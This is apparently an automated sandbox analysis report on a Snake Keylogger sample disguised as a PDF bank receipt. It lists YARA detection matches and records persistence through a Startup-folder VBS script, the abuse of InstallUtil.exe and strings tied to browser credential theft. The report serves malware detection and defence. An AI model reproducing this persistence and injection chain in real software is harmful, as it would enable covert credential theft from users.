              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D070406_2_06D07040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D028186_2_06D02818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0D0186_2_06D0D018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D000076_2_06D00007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D028076_2_06D02807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D044306_2_06D04430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0C9C86_2_06D0C9C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D085FC6_2_06D085FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D011916_2_06D01191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D051986_2_06D05198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0518A6_2_06D0518A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D081B06_2_06D081B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D091B86_2_06D091B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D081A06_2_06D081A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D07D586_2_06D07D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D00D486_2_06D00D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D07D486_2_06D07D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D079006_2_06D07900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D00D396_2_06D00D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0BD286_2_06D0BD28
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041086362.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000000.2007108399.0000000000BE4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2051557105.0000000006960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWscoozgjki.dll" vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWscoozgjki.dll" vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exeBinary or memory string: OriginalFilenamePhykedgoeth.exe8 vs e-dekont (72).pdf(#U007e56 KB).exe
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: e-dekont (72).pdf(#U007e56 KB).exe, Localization.csTask registration methods: 'CreateTask'
              Source: e-dekont (72).pdf(#U007e56 KB).exe, TaskFieldStructBuilder.csTask registration methods: 'RegisterFactory', 'CreateFactory'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, Localization.csTask registration methods: 'CreateTask'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, TaskFieldStructBuilder.csTask registration methods: 'RegisterFactory', 'CreateFactory'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: TypeName.exe.0.drBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: TypeName.exe.0.drBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: TypeName.exe.0.drBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: InstallUtil.exe, 00000002.00000002.4478272423.0000000002C56000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4482034005.0000000003A6D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4478272423.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.000000000359F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.0000000003578000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4477967897.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4482221632.00000000043AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: e-dekont (72).pdf(#U007e56 KB).exeVirustotal: Detection: 11%
              Source: e-dekont (72).pdf(#U007e56 KB).exeString found in binary or memory: </HTML>)<!--StartFragment-->mHighlighter does not belong to the specified document.
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile read: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe "C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe"
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeName.exe "C:\Users\user\AppData\Roaming\TypeName.exe"
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeName.exe "C:\Users\user\AppData\Roaming\TypeName.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
